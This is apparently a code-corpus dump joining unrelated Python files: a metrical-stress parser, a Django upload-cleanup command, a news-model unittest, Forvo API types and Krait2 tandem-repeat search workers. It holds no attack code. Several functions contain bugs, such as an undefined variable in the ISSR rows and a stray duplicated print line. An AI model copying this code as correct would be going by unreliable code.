        if isinstance(deptreeParser, compat.string_types):
            # Fix: include the "stanford-library/" prefix so the default
            # model path matches parse_worker and the STANFORD_* env vars.
            deptreeParser = DependencyTreeParser(
                model_path=os.path.join(script_dir, 'stanford-library/stanford-parser-full-%s/edu/stanford/nlp/models/lexparser/english%s.ser.gz' % (DATE, deptreeParser)))
        elif not isinstance(deptreeParser, DependencyTreeParser):
            raise ValueError('Provided an invalid dependency tree parser')
        self.deptreeParser = deptreeParser

    def dep_parse_sents(self, sentences, verbose=False):
        """Parse lists of tokens into dependency trees."""
        return self.deptreeParser.parse_sents(sentences, verbose)

    def dep_raw_parse(self, sentence, verbose=False):
        """Parse one raw sentence into dependency trees."""
        return self.deptreeParser.raw_parse(sentence, verbose)

    def dep_raw_parse_sents(self, sentences, verbose=False):
        """Parse multiple raw sentences into dependency trees."""
        return self.deptreeParser.raw_parse_sents(sentences, verbose)

    def dep_tagged_parse_sent(self, sentence, verbose=False):
        """Parse one pre-tagged sentence into dependency trees."""
        return self.deptreeParser.tagged_parse_sent(sentence, verbose)

    def dep_tagged_parse_sents(self, sentences, verbose=False):
        """Parse multiple pre-tagged sentences into dependency trees."""
        return self.deptreeParser.tagged_parse_sents(sentences, verbose)

    def lex_parse_sents(self, sentences, verbose=False):
        """Parse token lists and yield MetricalTrees with lexical stress."""
        sentences = self.dep_parse_sents(sentences, verbose)
        for tree in sentences:
            for t in tree:
                t = MetricalTree.convert(t)
                t.set_lstress()
                yield t

    def lex_raw_parse(self, sentence, verbose=False):
        """Parse one raw sentence and yield MetricalTrees with lexical stress."""
        sentence = self.dep_raw_parse(sentence, verbose)
        for t in sentence:
            t = MetricalTree.convert(t)
            t.set_lstress()
            yield t

    def lex_raw_parse_sents(self, sentences, verbose=False):
        """Parse raw sentences and yield MetricalTrees with lexical stress."""
        sentences = self.dep_raw_parse_sents(sentences, verbose)
        for tree in sentences:
            for t in tree:
                t = MetricalTree.convert(t)
                t.set_lstress()
                yield t

    def lex_tagged_parse(self, sentence, verbose=False):
        """Parse one tagged sentence and yield lexically stressed trees.

        Bug fix: this previously called ``self.dep_tagged_parse``, which
        does not exist; the single-sentence delegate is
        ``dep_tagged_parse_sent``.
        """
        sentence = self.dep_tagged_parse_sent(sentence, verbose)
        for t in sentence:
            t = MetricalTree.convert(t)
            t.set_lstress()
            yield t

    def lex_tagged_parse_sents(self, sentences, verbose=False):
        """Parse tagged sentences and yield lexically stressed trees."""
        sentences = self.dep_tagged_parse_sents(sentences, verbose)
        for tree in sentences:
            for t in tree:
                t = MetricalTree.convert(t)
                t.set_lstress()
                yield t

    def phr_parse_sents(self, sentences, stress_polysyll=False, verbose=True):
        """Parse token lists and yield fully stressed disambiguated trees."""
        for t in self.lex_parse_sents(sentences, verbose):
            trees = t.disambiguate(stress_polysyll)
            for tree in trees:
                tree.set_pstress()
                tree.set_stress()
            yield trees

    def phr_raw_parse(self, sentences, stress_polysyll=False, verbose=True):
        """Parse one raw sentence and yield fully stressed trees."""
        for t in self.lex_raw_parse(sentences, verbose):
            trees = t.disambiguate(stress_polysyll)
            for tree in trees:
                tree.set_pstress()
                tree.set_stress()
            yield trees

    def phr_raw_parse_sents(self, sentences, stress_polysyll=False, verbose=True):
        """Parse raw sentences and yield fully stressed trees."""
        for t in self.lex_raw_parse_sents(sentences, verbose):
            trees = t.disambiguate(stress_polysyll)
            for tree in trees:
                tree.set_pstress()
                tree.set_stress()
            yield trees

    def phr_tagged_parse(self, sentences, stress_polysyll=False, verbose=True):
        """Parse one tagged sentence and yield fully stressed trees."""
        for t in self.lex_tagged_parse(sentences, verbose):
            trees = t.disambiguate(stress_polysyll)
            for tree in trees:
                tree.set_pstress()
                tree.set_stress()
            yield trees

    def phr_tagged_parse_sents(self, sentences, stress_polysyll=False, verbose=True):
        """Parse tagged sentences and yield fully stressed trees."""
        for t in self.lex_tagged_parse_sents(sentences, verbose):
            trees = t.disambiguate(stress_polysyll)
            for tree in trees:
                tree.set_pstress()
                tree.set_stress()
            yield trees

    def get_stats(self, generator, arto=False):
        """Tabulate per-word stress statistics for each parsed sentence.

        For every tree from *generator*, three disambiguations are computed
        (maximally stressed m1; minimally stressed with/without stressed
        polysyllables m2a/m2b), plus per-sentence normalized variants.
        Returns a pandas DataFrame with one row per word.

        NOTE(review): the normalization divides by (max - min) of each
        sentence's stresses, which raises ZeroDivisionError when all words
        share one stress value -- confirm inputs make this impossible.
        """
        data = defaultdict(list)
        i = 0
        for t in generator:
            i += 1
            ambig1 = t.ambiguity(stress_polysyll=False)
            ambig2 = t.ambiguity(stress_polysyll=True)
            tree1 = t.max_stress_disambiguate()[0]
            tree1.set_pstress()
            tree1.set_stress()
            tree2a = t.min_stress_disambiguate(stress_polysyll=True)[0]
            tree2a.set_pstress()
            tree2a.set_stress()
            tree2b = t.min_stress_disambiguate(stress_polysyll=False)[0]
            tree2b.set_pstress()
            tree2b.set_stress()

            j = 0
            # Per-disambiguation min and span, used for normalization below.
            preterms1 = list(tree1.preterminals())
            min1 = float(min(
                [preterm.stress() for preterm in preterms1 if not np.isnan(preterm.stress())]))
            max1 = max([preterm.stress() for preterm in preterms1 if not np.isnan(
                preterm.stress())]) - min1

            preterms2a = list(tree2a.preterminals())
            min2a = float(min(
                [preterm.stress() for preterm in preterms2a if not np.isnan(preterm.stress())]))
            max2a = max([preterm.stress() for preterm in preterms2a if not np.isnan(
                preterm.stress())]) - min2a

            preterms2b = list(tree2b.preterminals())
            min2b = float(min(
                [preterm.stress() for preterm in preterms2b if not np.isnan(preterm.stress())]))
            max2b = max([preterm.stress() for preterm in preterms2b if not np.isnan(
                preterm.stress())]) - min2b

            preterms_raw = list(t.preterminals())
            minmean = float(min([np.mean([preterm1.stress(), preterm2a.stress(), preterm2b.stress()]) for preterm1,
                                 preterm2a, preterm2b in zip(preterms1, preterms2a, preterms2b) if not np.isnan(preterm1.stress())]))
            maxmean = max([np.mean([preterm1.stress(), preterm2a.stress(), preterm2b.stress()]) for preterm1, preterm2a,
                           preterm2b in zip(preterms1, preterms2a, preterms2b) if not np.isnan(preterm1.stress())]) - minmean

            sent = ' '.join([preterm[0] for preterm in preterms_raw])
            sentlen = len(preterms_raw)
            for preterm1, preterm2a, preterm2b, preterm_raw in zip(preterms1, preterms2a, preterms2b, preterms_raw):
                j += 1
                data['widx'].append(j)
                data['norm_widx'].append(float(j) / sentlen)
                data['word'].append(preterm1[0])
                if preterm_raw._lstress == 0:
                    data['lexstress'].append('yes')
                elif preterm_raw._lstress == -.5:
                    data['lexstress'].append('ambig')
                elif preterm_raw._lstress == -1:
                    data['lexstress'].append('no')
                else:
                    data['lexstress'].append('???')
                data['seg'].append(' '.join(preterm1.seg()))
                data['nseg'].append(preterm1.nseg())
                data['nsyll'].append(preterm1.nsyll())
                data['nstress'].append(preterm1.nstress())
                data['pos'].append(preterm1.category())
                data['dep'].append(preterm1.dependency())
                if arto:
                    # Arto notation: flip/shift so bigger = more stressed.
                    data['m1'].append(-(preterm1.stress()-1))
                    data['m2a'].append(-(preterm2a.stress()-1))
                    data['m2b'].append(-(preterm2b.stress()-1))
                    data['mean'].append(-(np.mean([preterm1.stress(),
                                                   preterm2a.stress(), preterm2b.stress()])-1))
                else:
                    data['m1'].append(preterm1.stress())
                    data['m2a'].append(preterm2a.stress())
                    data['m2b'].append(preterm2b.stress())
                    data['mean'].append(
                        np.mean([preterm1.stress(), preterm2a.stress(), preterm2b.stress()]))
                data['norm_m1'].append((preterm1.stress()-min1)/max1)
                data['norm_m2a'].append((preterm2a.stress()-min2a)/max2a)
                data['norm_m2b'].append((preterm2b.stress()-min2b)/max2b)
                data['norm_mean'].append((np.mean(
                    [preterm1.stress(), preterm2a.stress(), preterm2b.stress()])-minmean)/maxmean)
                data['sidx'].append(i)
                data['sent'].append(sent)
                data['ambig_words'].append(ambig1)
                data['ambig_monosyll'].append(ambig2)
            # One copy of the whole-sentence mean-stress contour per word row.
            data['contour'].extend([' '.join(str(x)
                                             for x in data['mean'][-(j):])]*j)
        for k, v in data.iteritems():
            data[k] = pd.Series(v)
        return pd.DataFrame(data, columns=['widx', 'norm_widx', 'word', 'seg', 'lexstress',
                                           'nseg', 'nsyll', 'nstress',
                                           'pos', 'dep',
                                           'm1', 'm2a', 'm2b', 'mean',
                                           'norm_m1', 'norm_m2a', 'norm_m2b', 'norm_mean',
                                           'sidx', 'sent', 'ambig_words', 'ambig_monosyll',
                                           'contour'])

    def stats_parse_sents(self, sentences, arto=False, verbose=True):
        """Parse token lists and return the per-word statistics DataFrame."""
        return self.get_stats(self.lex_parse_sents(sentences, verbose), arto=arto)

    def stats_raw_parse(self, sentence, arto=False, verbose=True):
        """Parse one raw sentence and return the statistics DataFrame."""
        return self.get_stats(self.lex_raw_parse(sentence, verbose), arto=arto)

    def stats_raw_parse_sents(self, sentences, arto=False, verbose=True):
        """Parse raw sentences and return the statistics DataFrame."""
        return self.get_stats(self.lex_raw_parse_sents(sentences, verbose), arto=arto)

    def stats_tagged_parse(self, sentence, arto=False, verbose=True):
        """Parse one tagged sentence and return the statistics DataFrame."""
        return self.get_stats(self.lex_tagged_parse(sentence, verbose), arto=arto)

    def stats_tagged_parse_sents(self, sentences, arto=False, verbose=True):
        """Parse tagged sentences and return the statistics DataFrame."""
        return self.get_stats(self.lex_tagged_parse_sents(sentences, verbose), arto=arto)
# ***********************************************************************
# Test the module
# Spawn one worker process per CPU and feed it the input file(s).
if __name__ == '__main__':
    """"""
    # NOTE(review): "glob" is imported but never used here.
    import glob
    import re
    import multiprocessing as mp
    import sys
    file = args.input  # NOTE(review): shadows the builtin "file" (Python 2)
    files = [file]
    try:
        workers = mp.cpu_count()
    except:
        # cpu_count() can raise NotImplementedError on some platforms.
        workers = 1
    q = mp.Queue()
    for filename in files:
        q.put(filename)
    # One 'STOP' sentinel per worker so every parse_worker loop terminates.
    for worker in xrange(workers):
        q.put('STOP')
    processes = []
    for worker in xrange(workers):
        process = mp.Process(target=parse_worker, args=(q,))
        process.start()
        processes.append(process)
    for process in processes:
        process.join()
| 39.225336 | 154 | 0.494898 | 28,775 | 0.822401 | 4,684 | 0.133871 | 748 | 0.021378 | 0 | 0 | 9,579 | 0.273772 |
d5ab5835f2e337b522ce060307e167093634b260 | 1,056 | py | Python | multiuploader/management/commands/clean_uploads.py | SharmaVinayKumar/django-multiuploader | 58e545307014830b00101129a297b6d465b87583 | [
"MIT"
] | 5 | 2017-02-25T21:12:37.000Z | 2017-03-12T15:05:55.000Z | multiuploader/management/commands/clean_uploads.py | SharmaVinayKumar/django-multiuploader | 58e545307014830b00101129a297b6d465b87583 | [
"MIT"
] | 4 | 2017-02-25T19:08:23.000Z | 2017-03-12T15:53:54.000Z | multiuploader/management/commands/clean_uploads.py | vinaypost/multiuploader | 58e545307014830b00101129a297b6d465b87583 | [
"MIT"
] | null | null | null | from __future__ import print_function, unicode_literals
import os
from datetime import timedelta
import multiuploader.default_settings as DEFAULTS
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils.timezone import now
from multiuploader.models import MultiuploaderFile
class Command(BaseCommand):
    """Management command that purges expired multiuploader attachments."""

    help = 'Clean all temporary attachments loaded to MultiuploaderFile model'

    def handle(self, *args, **options):
        """Remove on-disk files for expired uploads, then delete their rows."""
        # Expiration window in seconds; the project setting wins over the
        # packaged default.
        max_age = getattr(settings, "MULTIUPLOADER_FILE_EXPIRATION_TIME",
                          DEFAULTS.MULTIUPLOADER_FILE_EXPIRATION_TIME)
        cutoff = now() - timedelta(seconds=max_age)
        # Best-effort removal of the underlying files; a missing file must
        # not abort the cleanup of the remaining ones.
        for record in MultiuploaderFile.objects.filter(upload_date__lt=cutoff):
            try:
                os.remove(record.file.path)
            except Exception as err:
                print(err)
        MultiuploaderFile.objects.filter(upload_date__lt=cutoff).delete()
        print("Cleaning temporary upload files complete")
print("Cleaning temporary upload files complete")
| 35.2 | 87 | 0.730114 | 730 | 0.691288 | 0 | 0 | 0 | 0 | 0 | 0 | 145 | 0.137311 |
d5ab995005d2f182743e6f37ffa3d88f794d55fe | 540 | py | Python | tests/test_source.py | Koech-code/News-App | 07688d64df5d0512a8d59613d403f7d6a7377360 | [
"MIT"
] | null | null | null | tests/test_source.py | Koech-code/News-App | 07688d64df5d0512a8d59613d403f7d6a7377360 | [
"MIT"
] | null | null | null | tests/test_source.py | Koech-code/News-App | 07688d64df5d0512a8d59613d403f7d6a7377360 | [
"MIT"
] | null | null | null | import unittest
from app.models import Source
class testSource(unittest.TestCase):
    """
    SourcesTest class to test the behavior of the Sources class
    """

    def setUp(self):
        """
        Method that runs before each other test runs
        """
        self.new_source = Source('abc-news','ABC news','Your trusted source for breaking news',"https://abcnews.go.com","general","en","us")

    def test_instance(self):
        """The fixture should be an instance of Source."""
        # assertIsInstance gives a clearer failure message than
        # assertTrue(isinstance(...)).
        self.assertIsInstance(self.new_source, Source)


if __name__ == "__main__":
    unittest.main()
d5acd000db9d4a9b597057b8dfc5cb47789972b8 | 432 | py | Python | python_backend/custom_types/forvo_api_types.py | BenLeong0/japanese_vocab_fetcher | c441eaf46c7330f9319216a6321ce8ec8d3de6cc | [
"MIT"
] | null | null | null | python_backend/custom_types/forvo_api_types.py | BenLeong0/japanese_vocab_fetcher | c441eaf46c7330f9319216a6321ce8ec8d3de6cc | [
"MIT"
] | 2 | 2021-12-26T23:34:02.000Z | 2021-12-26T23:34:11.000Z | python_backend/custom_types/forvo_api_types.py | BenLeong0/japanese_vocab_fetcher | c441eaf46c7330f9319216a6321ce8ec8d3de6cc | [
"MIT"
] | null | null | null | from typing import Literal, TypedDict
class ForvoAPIItem(TypedDict):
    """One pronunciation entry in a Forvo API response.

    Field meanings are inferred from the Forvo pronunciation API --
    confirm against its official documentation.
    """
    id: int
    word: str
    original: str
    addtime: str
    hits: int
    username: str          # presumably the contributing speaker's account
    sex: str
    country: str
    code: str
    langname: str
    pathmp3: str           # URL of the MP3 audio file
    pathogg: str           # URL of the OGG audio file
    rate: int
    num_votes: int
    num_positive_votes: int
class ForvoAPIResponse(TypedDict):
    """Top-level Forvo API payload: a total count plus the item list."""
    attributes: dict[Literal["total"], int]  # {"total": <number of items>}
    items: list[ForvoAPIItem]
| 17.28 | 43 | 0.655093 | 388 | 0.898148 | 0 | 0 | 0 | 0 | 0 | 0 | 7 | 0.016204 |
d5ad2c2b6d4e8106ddd532340d0d9a878fb16570 | 16,522 | py | Python | src/workers.py | lmdu/krait2 | 82aff14cdbbb777ea391bcb8acf3cb95b913209a | [
"MIT"
] | 1 | 2021-05-16T08:37:22.000Z | 2021-05-16T08:37:22.000Z | src/workers.py | lmdu/krait2 | 82aff14cdbbb777ea391bcb8acf3cb95b913209a | [
"MIT"
] | null | null | null | src/workers.py | lmdu/krait2 | 82aff14cdbbb777ea391bcb8acf3cb95b913209a | [
"MIT"
] | null | null | null | import os
import csv
import time
import stria
import pyfastx
import traceback
import multiprocessing
from PySide6.QtCore import *
from primer3 import primerdesign
from motif import *
from stats import *
from utils import *
from config import *
from backend import *
from annotate import *
# Names exported by "from workers import *": the concrete worker-thread
# classes (their definitions follow; some lie beyond this excerpt).
__all__ = [
    'SSRSearchThread', 'VNTRSearchThread',
    'ISSRSearchThread', 'PrimerDesignThread',
    'SaveProjectThread', 'ExportSelectedRowsThread',
    'ExportWholeTableThread', 'ExportAllTablesThread',
    'TRELocatingThread', 'StatisticsThread'
]
class WorkerSignal(QObject):
    """Qt signals emitted by worker threads to update the main window."""
    progress = Signal(int)   # percent complete, 0-100 (see WorkerThread.run)
    messages = Signal(str)   # transient status-bar text
    errors = Signal(str)     # formatted traceback text
    finished = Signal()      # emitted once when the worker ends
    status = Signal(int)     # task status code -- consumed by change_task_status
class WorkerThread(QThread):
    """Base worker thread: wires WorkerSignal to the parent's UI slots and
    runs a subclass-provided process() with progress and error reporting.
    """

    def __init__(self, parent=None):
        super().__init__(parent)
        self.parent = parent
        self.search_all = parent.search_all
        self.signals = WorkerSignal()
        # Forward worker signals to the parent's UI handlers.
        self.signals.progress.connect(parent.change_progress)
        self.signals.messages.connect(parent.show_status_message)
        self.signals.errors.connect(parent.show_error_message)
        self.signals.status.connect(parent.change_task_status)
        self.settings = QSettings()

    def error(self):
        """Report the current exception's traceback to the UI and stdout."""
        errmsg = traceback.format_exc()
        self.signals.errors.emit(errmsg)
        print(errmsg)

    def process(self):
        """Override in subclasses with the actual work."""
        pass

    def run(self):
        """Thread entry point: run process(), reporting progress and errors."""
        self.signals.progress.emit(0)
        try:
            self.process()
        except Exception:
            # Was a bare "except:"; Exception avoids swallowing
            # SystemExit / KeyboardInterrupt while still reporting failures.
            self.error()
        self.signals.progress.emit(100)
        self.signals.finished.emit()
class SearchThread(WorkerThread):
_table = ''
def __init__(self, parent=None):
super().__init__(parent)
self.findex = 0
self.batch = 100
@property
def table(self):
return "{}_{}".format(self._table, self.findex)
@property
def fastas(self):
if not self.search_all:
selected = sorted(self.parent.file_table.get_selected_rows())
else:
selected = []
self.total_file = DB.get_one("SELECT COUNT(1) FROM fasta_0 LIMIT 1")
if self.search_all or len(selected) == self.total_file:
for fasta in DB.query("SELECT * FROM fasta_0"):
yield fasta
else:
self.total_file = len(selected)
slice_start = 0
slice_end = 0
while slice_start < self.total_file:
slice_end = slice_start + self.batch
ids = selected[slice_start:slice_end]
slice_start = slice_end
sql = "SELECT * FROM fasta_0 WHERE id IN ({})".format(','.join(['?']*len(ids)))
for fasta in DB.query(sql, ids):
yield fasta
def sql(self):
self.columns = len(DB.get_field(self.table)) - 1
return "INSERT INTO {} VALUES (NULL{})".format(
self.table,
",?" * self.columns
)
def args(self, name, seq):
return (name, seq)
@staticmethod
def search(*args):
pass
def rows(self, trs):
pass
def process(self):
progress = 0
processed_size = 0
processed_file = 0
with multiprocessing.Pool(1) as pool:
for fasta in self.fastas:
self.findex = fasta[0]
total_size = fasta[2]
#create ssr table for current file
DB.create_table(self._table, self.findex)
self.change_status('running')
seqs = pyfastx.Fastx(fasta[4], uppercase=True)
sql = self.sql()
for name, seq, _ in seqs:
self.signals.messages.emit('processing sequence {} in file {}'.format(name, fasta[1]))
proc = pool.apply_async(self.search, self.args(name, seq))
trs = proc.get()
DB.insert_rows(sql, self.rows(trs))
processed_size += len(seq)
if processed_size > total_size:
r = 0
else:
r = processed_size/total_size
p = int((processed_file + r)/self.total_file*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
processed_file += 1
self.change_status('success')
def error(self):
self.signals.errors.emit(traceback.format_exc())
self.change_status('failure')
def change_status(self, status):
DB.update_status(self.findex, status)
self.signals.status.emit(self.findex)
class SSRSearchThread(SearchThread):
_table = 'ssr'
def __init__(self, parent):
super().__init__(parent)
self.settings.beginGroup("SSR")
self.min_repeats = [
self.settings.value('mono', 12, int),
self.settings.value('di', 7, int),
self.settings.value('tri', 5, int),
self.settings.value('tetra', 4, int),
self.settings.value('penta', 4, int),
self.settings.value('hexa', 4, int)
]
self.settings.endGroup()
standard_level = self.settings.value('STR/level', 3, type=int)
self.motifs = StandardMotif(standard_level)
def args(self, name, seq):
return (name, seq, self.min_repeats)
@staticmethod
def search(*args):
return stria.SSRMiner(*args).as_list()
def rows(self, ssrs):
for ssr in ssrs:
row = [ssr[0], ssr[1], ssr[2], ssr[3], self.motifs.standard(ssr[3]),
iupac_numerical_multiplier(ssr[4]), ssr[5], ssr[6]]
yield row
class CSSRSearchThread(SearchThread):
_table = 'cssr'
def __init__(self, parent):
super().__init__(parent)
params = ['SSR/mono', 'SSR/di', 'SSR/tri', 'SSR/tetra', 'SSR/penta', 'SSR/hexa']
self.min_repeats = []
for param in params:
default, func = KRAIT_PARAMETERS[param]
self.min_repeats.append(self.settings.value(param, default, func))
default, func = KRAIT_PARAMETERS['CSSR/dmax']
self.dmax = self.settings.value('CSSR/dmax', default, func)
def args(self, name, seq):
return (name, seq, self.min_repeats)
@staticmethod
def search(*args):
return stria.SSRMiner(*args).as_list()
'''
def rows(self, ssrs):
cssrs = [next(ssrs)]
for ssr in ssrs:
dmax = ssr[1] - cssrs[-1][2] - 1
if dmax <= self.dmax:
cssrs.append(ssr)
else:
if len(cssrs) > 1:
pass
cssrs = [ssr]
if len(cssrs) > 1:
self.
def adjacent_join(self, cssrs):
return (cssrs[0][0], cssrs[0][1], cssrs[-1][2], len(cssrs),
cssrs[-1][2] - cssrs[0][1] + 1,
"{}-{}".format(cssrs[0])
)
'''
class VNTRSearchThread(SearchThread):
_table = 'vntr'
def __init__(self, parent):
super().__init__(parent)
self.params = []
params = ['VNTR/minmotif', 'VNTR/maxmotif', 'VNTR/minrep']
for param in params:
default, func = KRAIT_PARAMETERS[param]
self.params.append(self.settings.value(param, default, func))
def args(self, name, seq):
return (name, seq, *self.params)
@staticmethod
def search(*args):
return stria.VNTRMiner(*args).as_list()
def rows(self, vntrs):
for vntr in vntrs:
row = list(vntr)
row[4] = iupac_numerical_multiplier(row[4])
yield row
class ISSRSearchThread(SearchThread):
_table = 'issr'
def __init__(self, parent):
super().__init__(parent)
self.params = [1, 6]
params = ['ISSR/minsrep', 'ISSR/minslen', 'ISSR/maxerr',
'ISSR/subpena', 'ISSR/inspena', 'ISSR/delpena',
'ISSR/matratio', 'ISSR/maxextend']
for param in params:
default, func = KRAIT_PARAMETERS[param]
self.params.append(self.settings.value(param, default, func))
standard_level = self.settings.value('STR/level', 3, type=int)
self.motifs = StandardMotif(standard_level)
def args(self, name, seq):
return (name, seq, *self.params)
@staticmethod
def search(*args):
return stria.ITRMiner(*args).as_list()
def rows(self, issrs):
for issr in issrs:
row = issr[0:4]
row.append(self.motifs.standard(issr[3]))
row.append(iupac_numerical_multiplier(ssr[4]))
row.extend(issr[5:])
yield row
class PrimerDesignThread(WorkerThread):
def __init__(self, parent=None, table=None):
super().__init__(parent)
self.batch = 100
#current table is tandem repeat table, not primer table
self.table, self.findex = table.split('_')
param = "STR/flank"
default, func = KRAIT_PARAMETERS[param]
self.flank_len = self.settings.value(param, default, func)
self._sql = "SELECT * FROM {} WHERE id IN ({})".format(table, ','.join(['?']*self.batch))
self._isql = "INSERT INTO primer_{} VALUES (NULL{})".format(self.findex, ',?'*15)
DB.create_table('primer', self.findex)
DB.clear_table('primer', self.findex)
self.read_primer_settings()
def read_primer_settings(self):
self.primer_tags = {}
self.settings.beginGroup("PRIMER")
for k in self.settings.allKeys():
default, func = primer_tag_format(k)
self.primer_tags[k] = self.settings.value(k, default, func)
self.settings.endGroup()
if not self.primer_tags:
for param in PRIMER_COMMONS:
default, _ = PRIMER_PARAMETERS[param]
self.primer_tags = default
size_ranges = self.primer_tags['PRIMER_PRODUCT_SIZE_RANGE']
self.primer_tags['PRIMER_PRODUCT_SIZE_RANGE'] = product_size_format(size_ranges)
self.primer_tags['PRIMER_TASK'] = 'generic'
self.primer_tags['PRIMER_PICK_LEFT_PRIMER'] = 1
self.primer_tags['PRIMER_PICK_INTERNAL_OLIGO'] = 0
self.primer_tags['PRIMER_PICK_RIGHT_PRIMER'] = 1
def sql(self, num):
if num == self.batch:
return self._sql
else:
return "SELECT * FROM {}_{} WHERE id IN ({})".format(self.table, self.findex, ','.join(['?']*num))
def process(self):
#get fasta file path
fasta_file = DB.get_one("SELECT fasta FROM fasta_0 WHERE id=?", self.findex)
fasta = pyfastx.Fasta(fasta_file, uppercase=True)
primerdesign.setGlobals(self.primer_tags, None, None)
selected = sorted(self.parent.get_selected_rows())
total = len(selected)
processed = 0
progress = 0
slice_start = 0
slice_end = 0
while slice_start < total:
slice_end = slice_start + self.batch
ids = selected[slice_start:slice_end]
slice_start = slice_end
primer_list = []
for tr in DB.query(self.sql(len(ids)), ids):
tr_start = tr[2] - self.flank_len
if tr_start < 1:
tr_start = 1
tr_end = tr[3] + self.flank_len
if tr_end > len(fasta[tr[1]]):
tr_end = len(fasta[tr[1]])
tr_seq = fasta.fetch(tr[1], (tr_start, tr_end))
tr_len = tr[3] - tr[2] + 1
locus = "{}.{}.{}".format(self.table, self.findex, tr[0])
primerdesign.setSeqArgs({
'SEQUENCE_ID': locus,
'SEQUENCE_TEMPLATE': tr_seq,
'SEQUENCE_TARGET': [tr[2]-tr_start, tr_len]
})
res = primerdesign.runDesign(False)
if res:
primer_count = res['PRIMER_PAIR_NUM_RETURNED']
for i in range(primer_count):
primer_info = [locus, i+1,
res['PRIMER_PAIR_%s_PRODUCT_SIZE' % i],
res['PRIMER_LEFT_%s_SEQUENCE' % i],
round(res['PRIMER_LEFT_%s_TM' % i], 2),
round(res['PRIMER_LEFT_%s_GC_PERCENT' % i], 2),
round(res['PRIMER_LEFT_%s_END_STABILITY' % i], 2),
res['PRIMER_RIGHT_%s_SEQUENCE' % i],
round(res['PRIMER_RIGHT_%s_TM' % i], 2),
round(res['PRIMER_RIGHT_%s_GC_PERCENT' % i], 2),
round(res['PRIMER_RIGHT_%s_END_STABILITY' % i], 2),
]
primer_info.extend(res['PRIMER_LEFT_%s' % i])
primer_info.extend(res['PRIMER_RIGHT_%s' % i])
primer_list.append(primer_info)
if primer_list:
DB.insert_rows(self._isql, primer_list)
processed += len(ids)
p = int(processed/total*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
class SaveProjectThread(WorkerThread):
def __init__(self, parent=None, save_file=None):
super().__init__(parent)
self.save_file = save_file
def process(self):
self.signals.messages.emit("Saving to {}".format(self.save_file))
progress = 0
#close transaction
DB.commit()
with DB.save_to_file(self.save_file) as backup:
while not backup.done:
backup.step(10)
p = int((backup.pagecount - backup.remaining)/backup.pagecount*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
self.signals.messages.emit("Successfully saved to {}".format(self.save_file))
class ExportSelectedRowsThread(WorkerThread):
def __init__(self, parent=None, table=None, out_file=None):
super().__init__(parent)
self.table = table
self.out_file = out_file
self.batch = 100
def process(self):
selected = sorted(self.parent.get_selected_rows())
title = DB.get_field(self.table)
total = len(selected)
processed = 0
progress = 0
slice_start = 0
slice_end = 0
if self.out_file.endswith('.csv'):
separator = ','
else:
separator = '\t'
with open(self.out_file, 'w') as fh:
writer = csv.writer(fh, delimiter=separator)
writer.writerow(title)
while slice_start < total:
slice_end = slice_start + self.batch
ids = selected[slice_start:slice_end]
slice_start = slice_end
sql = "SELECT * FROM {} WHERE id IN ({})".format(self.table, ','.join(['?']*len(ids)))
for row in DB.query(sql, ids):
writer.writerow(row)
processed += len(ids)
p = int(processed/total*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
self.signals.messages.emit("Successfully exported {} rows to {}".format(total, self.out_file))
class ExportWholeTableThread(WorkerThread):
def __init__(self, parent=None, table=None, out_file=None):
super().__init__(parent)
self.table = table
self.out_file = out_file
def process(self):
title = DB.get_field(self.table)
total = DB.get_one("SELECT COUNT(1) FROM {}".format(self.table))
processed = 0
progress = 0
if self.out_file.endswith('.csv'):
separator = ','
else:
separator = '\t'
with open(self.out_file, 'w') as fh:
writer = csv.writer(fh, delimiter=separator)
writer.writerow(title)
for row in DB.query("SELECT * FROM {}".format(self.table)):
writer.writerow(row)
processed += 1
p = int(processed/total*100)
if p > progress:
self.signals.progress.emit(p)
progress = p
self.signals.messages.emit("Successfully exported the whole table to {}".format(total, self.out_file))
class ExportAllTablesThread(WorkerThread):
def __init__(self, parent=None, out_dir=None):
super().__init__(parent)
self.out_dir = out_dir
def process(self):
tables = DB.get_tables()
total = len(tables)
processed = 0
progress = 0
#get fasta name and id mapping
fasta_mapping = {}
for row in DB.query("SELECT id, name FROM fasta_0"):
fasta_mapping[str(row[0])] = row[1]
for table in tables:
if table == 'fasta_0':
out_file = os.path.join(self.out_dir, 'input_fastas.csv')
else:
_type, _id = table.split('_')
out_file = os.path.join(self.out_dir, '{}_{}.csv'.format(
fasta_mapping[_id], _type
))
DB.export_to_csv(table, out_file)
processed += 1
p = processed/total*100
if p > progress:
self.signals.progress.emit(p)
progress = p
class TRELocatingThread(SearchThread):
_table = 'locate'
def __init__(self, parent=None):
super().__init__(parent)
self.type_mapping = {'ssr': 1, 'cssr': 2,
'vntr': 3, 'itr': 4}
def process(self):
progress = 0
processed = 0
for fasta in self.fastas:
self.findex = fasta[0]
self.change_status('running')
annot_file = fasta[5]
if not annot_file:
continue
tre_types = {
'ssr': DB.get_count("ssr_{}".format(self.findex)),
'vntr': DB.get_count("vntr_{}".format(self.findex)),
'cssr': DB.get_count("cssr_{}".format(self.findex)),
'itr': DB.get_count("itr_{}".format(self.findex))
}
if any(tre_types.values()):
#parse annotation file
locator = annotation_parser(annot_file)
#build index
locator.index()
else:
continue
#create annotation table for current file
DB.create_table(self._table, self.findex)
for tre_type in tre_types:
if not tre_types[tre_type]:
continue
feat_id = self.type_mapping[tre_type]
tre_annots = []
for tre in DB.query("SELECT * FROM {}_{}".format(tre_type, self.findex)):
locs = locator.locate(tre[1], tre[2], tre[3])
for loc in locs:
tre_annots.append((tre[0], feat_id, *loc))
if tre_annots:
DB.insert_rows(self.sql(), tre_annots)
class StatisticsThread(WorkerThread):
def __init__(self, parent=None):
super().__init__(parent)
@property
def fastas(self):
if not self.search_all:
selected = sorted(self.parent.file_table.get_selected_rows())
else:
selected = []
self.total_file = DB.get_one("SELECT COUNT(1) FROM fasta_0 LIMIT 1")
if self.search_all or len(selected) == self.total_file:
for fasta in DB.query("SELECT id FROM fasta_0"):
yield fasta[0]
else:
for _id in selected:
return _id
def process(self):
for fasta_id in self.fastas:
#create stats result table
DB.create_table('stats', fasta_id)
#perform fasta general stats
self.signals.messages.emit("Extracting fasta file information...")
FastaStatistics(fasta_id)
#perform ssr stats
if DB.table_exists('ssr_{}'.format(fasta_id)):
self.signals.messages.emit("Performing SSR statistics...")
SSRStatistics(fasta_id)
